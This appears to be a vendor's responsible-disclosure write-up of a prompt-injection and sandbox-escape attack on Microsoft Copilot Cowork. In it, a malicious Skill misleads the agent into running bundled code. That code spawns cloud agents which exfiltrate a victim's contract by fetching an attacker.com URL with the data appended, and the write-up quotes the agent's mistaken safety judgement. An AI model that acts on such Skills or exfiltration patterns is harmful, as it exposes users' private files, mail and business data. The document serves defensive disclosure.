Context
Microsoft Copilot Cowork is an agent in M365 that runs in a sandbox intended to block network access and prevent the agent from running code that reaches any untrusted services.
In order for Copilot Cowork to generate responses, the sandbox forwarded network requests to Anthropic. Malicious Skills were able to hijack this pathway to exfiltrate data by spawning new agents in Anthropic’s cloud equipped with network-capable tools that could reach an attacker’s server.
No human in the loop approval was required, and the attack could target any data Copilot could access - from uploaded files, to SharePoint, to Teams, Outlook, and more.
This vulnerability was disclosed to Microsoft on July 14, 2026, and was remediated as of September 2, 2026. More details on responsible disclosure are at the bottom of the article.
The Attack Chain
The victim uploads a sensitive document they want to review
The victim uploads an MSA draft to Copilot Cowork The victim invokes a Skill they found online; it conceals malicious prompts and code
Skills are frequently found online and uploaded by users, and they can also be shared intra-org within M365. Per the documentation, “Skills can also include up to 20 companion files (such as reference documents and scripts)”. One script bundled with this Skill is malicious.
The victim invokes a contract review Skill found online Copilot Cowork is manipulated by the malicious Skill into running malicious code
The malicious Skill’s description falsely claims that “All processing runs on-device, no document content is transmitted to third-party services.” After making a minimal attempt to review the Skill's code, Copilot concludes, "The script is a safe local analyzer — no network calls... Let me run it now."
When Copilot runs the code, it hunts through the user's data, exploits a vulnerability to spawn agents outside the sandbox, and uses those agents to exfiltrate the victim's data to an attacker's server.
Copilot runs the Skill’s bundled code, believing it to be a safe local analyzer The malicious code exfiltrates data from the sandbox by hijacking Copilot’s AI gateway
The malicious Skill activates the same AI gateway Copilot itself uses to generate responses. The Skill’s code spins up agents running in Anthropic’s cloud. Each has one sentence from the victim’s document, access to a web fetch tool, and instructions to fetch
attacker.com/?data={victim’s data here}. The attacker’s server logs every URL it received a request for, including the victim’s data that was appended to the requested URLs.The malicious Skill activates the local AI gateway to send data to the attacker The attacker can read the victim’s contract in their server logs
Below, the attacker’s server log displays the victim’s exfiltrated contract. However, this attack could have just as easily targeted any data in SharePoint, Teams, Outlook, or other sources connected to Copilot. This is because the malicious Skill code can directly call Copilot’s tools without going through the model, as demonstrated by our prior research on a different sandbox bypass in Copilot.
The attacker’s server logs contain the victim’s contract
Responsible Disclosure
This vulnerability was disclosed to Microsoft on July 14, 2026, and was remediated as of September 2, 2026.
Timeline
| Date | Event |
|---|---|
| July 14, 2026 | PromptArmor discloses to Microsoft |
| July 14, 2026 | Microsoft confirms receipt |
| August 17, 2026 | Microsoft confirms reported behavior |
| September 2, 2026 | Microsoft confirms a fix has been implemented |